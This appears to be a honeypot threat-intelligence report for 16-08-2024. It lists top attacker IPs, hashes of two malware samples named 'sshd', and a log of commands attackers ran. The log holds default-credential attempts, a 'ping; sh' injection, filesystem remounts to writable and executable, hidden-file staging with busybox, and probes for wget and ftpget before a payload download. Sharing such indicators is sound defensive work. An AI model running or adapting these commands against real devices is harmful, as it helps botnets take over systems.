Top 5 IPs for 16-08-2024 :

103.179.243.194
184.168.125.143
43.249.184.106
64.227.174.243
218.77.97.53


Malware Observed:


File name : sshd
94f2e4d8d4436874785cd14e6e6d403507b8750852f7f2040352069a75da4c00
https://www.virustotal.com/gui/file/94f2e4d8d4436874785cd14e6e6d403507b8750852f7f2040352069a75da4c00

File name : sshd
dd2d81becef39adc952f8b43d5ba60420bf8548b1366994b7100631b848327b4
https://www.virustotal.com/gui/file/dd2d81becef39adc952f8b43d5ba60420bf8548b1366994b7100631b848327b4



Commands/exploits observed


guest
guest
enable
system
shell
sh
ping; sh
mount -o remount,rw,exec /; >/.a && cd /;(/bin/busybox echo -e "\\x44\\x49\\x52"||echo -e "\\x44\\x49\\x52")
mount -o remount,rw,exec /var/; >/var/.a && cd /var/;(/bin/busybox echo -e "\\x44\\x49\\x52"||echo -e "\\x44\\x49\\x52")
mount -o remount,rw,exec /mnt/; >/mnt/.a && cd /mnt/;(/bin/busybox echo -e "\\x44\\x49\\x52"||echo -e "\\x44\\x49\\x52")
mount -o remount,rw,exec /var/run/; >/var/run/.a && cd /var/run/;(/bin/busybox echo -e "\\x44\\x49\\x52"||echo -e "\\x44\\x49\\x52")
mount -o remount,rw,exec /etc/; >/etc/.a && cd /etc/;(/bin/busybox echo -e "\\x44\\x49\\x52"||echo -e "\\x44\\x49\\x52")
mount -o remount,rw,exec /dev/; >/dev/.a && cd /dev/;(/bin/busybox echo -e "\\x44\\x49\\x52"||echo -e "\\x44\\x49\\x52")
mount -o remount,rw,exec /tmp/; >/tmp/.a && cd /tmp/;(/bin/busybox echo -e "\\x44\\x49\\x52"||echo -e "\\x44\\x49\\x52")
mount -o remount,rw,exec /dev/shm/; >/dev/shm/.a && cd /dev/shm/;(/bin/busybox echo -e "\\x44\\x49\\x52"||echo -e "\\x44\\x49\\x52")
mount -o remount,rw,exec /var/home/user/fw/; >/var/home/user/fw/.a && cd /var/home/user/fw/;(/bin/busybox echo -e "\\x44\\x49\\x52"||echo -e "\\x44\\x49\\x52")
for p in `cat /proc/mounts|grep tmpfs|cut -d ' ' -f 2`;do cat $SHELL >$p/.a&&cd $p;rm .a;done;(echo -e "\\x44\\x49\\x52"||/bin/busybox echo -e "\\x44\\x49\\x52")
rm -rf .f; >.f; (cp $SHELL .f || /bin/busybox cp /bin/busybox .f || chmod 777 .f); >.f||rm -rf .f
rm -rf .d; >.d; (cp $SHELL .d || /bin/busybox cp /bin/busybox .d || chmod 777 .d); >.d||rm -rf .d
(/bin/busybox wget --help||wget --help)&&echo -e "\\x57\\x47\\x45\\x54"||(/bin/busybox ftpget --help||ftpget --help)&&echo -e "\\x46\\x54\\x50"||echo -en "\\x45\\x43\\x48\\x4f"
